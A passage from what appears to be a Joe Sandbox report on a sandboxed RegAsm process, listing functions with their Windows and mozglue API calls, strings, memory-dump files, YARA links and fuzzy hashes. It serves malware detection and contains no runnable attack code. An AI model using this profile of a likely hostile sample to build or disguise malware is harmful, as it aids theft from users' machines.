Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
Instruction ID: 61088e3dfc20ce59d559a3ddfa1e0e88c0a27e6c6fc14d0a94ffceeb635e971d
Opcode Fuzzy Hash: e5b528c2df55b90b8f95683bbe5c3f4538672bfb3054380b72a1938f3589f922
Instruction Fuzzy Hash: A0F09672F047309BDB11FB79740675E76A0AF4076CFA2014FF454A62D2CB2C5940D65D

Function 6C571700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C571800

Part of subcall function 6C54CBE8: GetCurrentProcess.KERNEL32(?,6C5131A7), ref: 6C54CBF1
Part of subcall function 6C54CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5131A7), ref: 6C54CBFA

Part of subcall function 6C514290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C553EBD,6C553EBD,00000000), ref: 6C5142A9

Strings

name, xrefs: 6C571939
{marker.name} - {marker.data.name}, xrefs: 6C5718C7
Details, xrefs: 6C571925

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: fef3d672320a25962d39eb91bc852d4c8d93a6cdeb20728ced0723510d85f10a
Instruction ID: 17b8bd74aa704a38bb9ce61123e77c4b8d6d09fce935da7775d4cd37519f9185
Opcode Fuzzy Hash: fef3d672320a25962d39eb91bc852d4c8d93a6cdeb20728ced0723510d85f10a
Instruction Fuzzy Hash: FB71E4B1A00346DFDB04DF28D85479ABBB1FF85304F5146A9D8194BB41D770EA98CBE1

Function 6C57B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6C57B0A6,6C57B0A6,?,6C57AF67,?,00000010,?,6C57AF67,?,00000010,00000000,?,?,6C57AB1F), ref: 6C57B1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C57B0A6,6C57B0A6,?,6C57AF67,?,00000010,?,6C57AF67,?,00000010,00000000,?), ref: 6C57B1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C57B0A6,6C57B0A6,?,6C57AF67,?,00000010,?,6C57AF67,?,00000010), ref: 6C57B25F

Strings

map/set<T> too long, xrefs: 6C57B1FA

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: d19e8eb3b163e954eaa6fef869a1528f65a813dab40969621fb29b9979508f45
Instruction ID: fb0a7a724908b70df8dbda6f930031556b4fad15c2f4f7e1fd5b8269f2830805
Opcode Fuzzy Hash: d19e8eb3b163e954eaa6fef869a1528f65a813dab40969621fb29b9979508f45
Instruction Fuzzy Hash: 66617974A05245CFD711DF19C880A9ABBF1FF8A318F28C599D8598BB52C331EC85CBA1

Function 6C53D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C54CBE8: GetCurrentProcess.KERNEL32(?,6C5131A7), ref: 6C54CBF1
Part of subcall function 6C54CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5131A7), ref: 6C54CBFA

EnterCriticalSection.KERNEL32(6C59E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C54D1C5), ref: 6C53D4F2
LeaveCriticalSection.KERNEL32(6C59E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C54D1C5), ref: 6C53D50B

Part of subcall function 6C51CFE0: EnterCriticalSection.KERNEL32(6C59E784), ref: 6C51CFF6
Part of subcall function 6C51CFE0: LeaveCriticalSection.KERNEL32(6C59E784), ref: 6C51D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C54D1C5), ref: 6C53D52E
EnterCriticalSection.KERNEL32(6C59E7DC), ref: 6C53D690
LeaveCriticalSection.KERNEL32(6C59E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C54D1C5), ref: 6C53D751

Strings

MOZ_CRASH(), xrefs: 6C53D4BB

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 18f6e87073b6337636342a8203ef7e94f2a94f75fddf45f9579a4cc7b63b4a3c
Instruction ID: 046e765c4541dd462c0839475010a898fd78d5158fe345a6d442c5a36e11903d
Opcode Fuzzy Hash: 18f6e87073b6337636342a8203ef7e94f2a94f75fddf45f9579a4cc7b63b4a3c
Instruction Fuzzy Hash: C551F371A047918FD314CF28C89471AB7F1FB89704F668A2EE5A9C7B45E770E804CB92

Function 6C564630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C564721

Strings

., xrefs: 6C56476A
-%llu, xrefs: 6C564733
profiler-paused, xrefs: 6C5646E4

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: a7627a3248a0cb485bf5bcf57163e12f4e8c9c6583f49732f88715968210c0f6
Instruction ID: 6ef8f17a9761c2ead04d6b40734617806f3cd705ed6fde44c0df75e905d4abb7
Opcode Fuzzy Hash: a7627a3248a0cb485bf5bcf57163e12f4e8c9c6583f49732f88715968210c0f6
Instruction Fuzzy Hash: 12414671A047189FCB08DF7ADC6115EBBE5EFC6744F11863EE84597B51EB3098448781

Function 6C589830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C58985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C58987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C5898DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C5898D9

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: 5ffaa7c05256ae65e2ccbe7c91e82d6aaab6a39b67a5142a03cd29b136fa8eb9
Instruction ID: e92cc536b8a3cd4d02ecb9406673e09d0df022c43adfd65c4ee1da88959bb169
Opcode Fuzzy Hash: 5ffaa7c05256ae65e2ccbe7c91e82d6aaab6a39b67a5142a03cd29b136fa8eb9
Instruction Fuzzy Hash: 41310571B00218ABDB14AF59DC449EF77A9EFC5314F40842DEA0A9BB40DB316D09CBE1

Function 6C5646E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C564721

Part of subcall function 6C514410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C553EBD,00000017,?,00000000,?,6C553EBD,?,?,6C5142D2), ref: 6C514444

Strings

., xrefs: 6C56476A
-%llu, xrefs: 6C564733
profiler-paused, xrefs: 6C5646E4

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 510cdeee3a822be42b2f2146e8d5e7307b82b1698f67ed25739b14d45fee1f54
Instruction ID: 7bb78576d11cb48056150e249730b91f7b7143792221cf4789e53831ac9034e4
Opcode Fuzzy Hash: 510cdeee3a822be42b2f2146e8d5e7307b82b1698f67ed25739b14d45fee1f54
Instruction Fuzzy Hash: 5931E571F042189BCB08DF69DC9169EBBE69B89314F15853EE8059BB51EB7098058B90

Function 6C56B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C514290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C553EBD,6C553EBD,00000000), ref: 6C5142A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C56B127), ref: 6C56B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C56B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C56B4E4

Strings

pid:, xrefs: 6C56B4DE

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 343320edeb0554fbbc9ecffcfd7a330407e201348fc07e868c9292d43f5d0fdf
Instruction ID: 90b75e149867fb1e6077f7c6413d7842df87bef20fcbad56f1eeec0c17260ca0
Opcode Fuzzy Hash: 343320edeb0554fbbc9ecffcfd7a330407e201348fc07e868c9292d43f5d0fdf
Instruction Fuzzy Hash: C9311331A01218CBDB00EFAADC80AEEB7B6FF84309F540529E80167F51E731A945DBE1

Function 00410077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0041009A

Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33

__EH_prolog3_catch.LIBCMT ref: 00410139
std::_Xinvalid_argument.LIBCPMT ref: 0041014D

Strings

vector<T> too long, xrefs: 00410095, 00410148

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction ID: ab79b4cfd7630e9d33afc21f0db27ea74fca8642dd6ebc8e538bd538cb18ba69
Opcode Fuzzy Hash: cc5a60ddabb20db1201aed0d317c3cbb809968f8e12f32ad08655375e537c1c5
Instruction Fuzzy Hash: 7931E532B503269BDB08EF6DAC45AED77E2A705311F51107FE520E7290D6BE9EC08B48

Function 00413390 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004133AF
StrCmpCA.SHLWAPI(00000000,004367E0,?), ref: 004133E8

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

strtok_s.MSVCRT ref: 00413424

Strings

"xA, xrefs: 004133A1, 004133A4

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID: "xA
API String ID: 348468850-582338916
Opcode ID: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
Instruction ID: 530b5b9384520956d988ef5f9eef14088f7e00acaaf5feba0a58aa85cdec459f
Opcode Fuzzy Hash: bf84bfb386d6fc06eea78c161eafd360b80df2d8d05c54f88f0f7eaf07e2e23e
Instruction Fuzzy Hash: 74118171900115AFDB01DF54C945BDAB7BCBF1430AF119067E805EB192EB78EF988B98

Function 6C52BF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C577A3F), ref: 6C52BF11
?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C577A3F), ref: 6C52BF5D
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C577A3F), ref: 6C52BF7E

Strings

Xl, xrefs: 6C52BF84

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
String ID: Xl
API String ID: 4279176481-2719694139
Opcode ID: 3b5d9e01ddf225591e6a0312008b9d3edfbbab4042dafc4e45d85afcdd59461c
Instruction ID: 01cf09aeafba2720633d216508cc448c779665b4fa292c55377d57ac3ec39a7c
Opcode Fuzzy Hash: 3b5d9e01ddf225591e6a0312008b9d3edfbbab4042dafc4e45d85afcdd59461c
Instruction Fuzzy Hash: 1811EF79201750CFD729CF0CC998A26FBF8FB4A304356889DE98A8B760C771A800CF90

Function 6C51F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6C58D020), ref: 6C51F122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C51F132

Strings

SHGetKnownFolderPath, xrefs: 6C51F12C
shell32, xrefs: 6C51F11D

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: ae5bf10729dc668c5511cb6cca0f41e62d6cd886f5938dc960d363227a6e397e
Instruction ID: 224d2cf8ac1ef6c9399bc42c882c1afed4abe301677bc822018a6a0410848245
Opcode Fuzzy Hash: ae5bf10729dc668c5511cb6cca0f41e62d6cd886f5938dc960d363227a6e397e
Instruction Fuzzy Hash: F0019E717002559BDB00DF66DC48A5F7BB8FF8A264B520619F849D7600D730A900CBA0

Function 6C55E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C55E577
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55E584
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C55E8A6

Strings

MOZ_PROFILER_STARTUP, xrefs: 6C55E5A1, 6C55E5CC, 6C55E5FF, 6C55E62A
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C55E826, 6C55E850
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C55E655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C55E722, 6C55E750, 6C55E7A2
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C55E777

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 996ff422687e07f9d5e4055354ad598e2d8de9bc119bc9342cd54a55090edb92
Instruction ID: 10ef7a85c9ca85cee9055c6d01d38692481c4b0e45c7c8facd68aad5e5464c1f
Opcode Fuzzy Hash: 996ff422687e07f9d5e4055354ad598e2d8de9bc119bc9342cd54a55090edb92
Instruction Fuzzy Hash: 6E11A132604294DFCB109F15CC48B5EBBF8FB89328F430699F85A47650D774A814CB9A

Function 0040F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F282

Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC0D
Part of subcall function 0042EBF8: __CxxThrowException@8.LIBCMT ref: 0042EC22
Part of subcall function 0042EBF8: std::exception::exception.LIBCMT ref: 0042EC33

std::_Xinvalid_argument.LIBCPMT ref: 0040F28D

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

Strings

string too long, xrefs: 0040F27D
invalid string position, xrefs: 0040F288

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
Instruction ID: e6539817a9f8634559db26b0b382dc9566da10c2029d1fc652b1cb6cacdddcbf
Opcode Fuzzy Hash: 941df7bd290407a9ef689aa40561f47c5295f4f3ec763d10fe6edd7e59272ef7
Instruction Fuzzy Hash: 55D012B5A4020C7BCB04E79AE816ACDBAE99B58714F20016FB616D3641EAB8A6004569

Function 00411D61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
HeapAlloc.KERNEL32(00000000), ref: 00411D73
wsprintfW.USER32 ref: 00411D84

Strings

%hs, xrefs: 00411D7E

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction ID: 516a0af99a9d3ed9a850d6bfca40a0a85ae49b58000b6b42a5d70a6c01262027
Opcode Fuzzy Hash: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction Fuzzy Hash: F2D0A73134031477C61027D4BC0DF9A3F2CDB067A2F001130FA0DD6151C96548144BDD

Function 004013F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
ReleaseDC.USER32(00000000,00000000), ref: 00401416

Strings

DISPLAY, xrefs: 004013FD

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

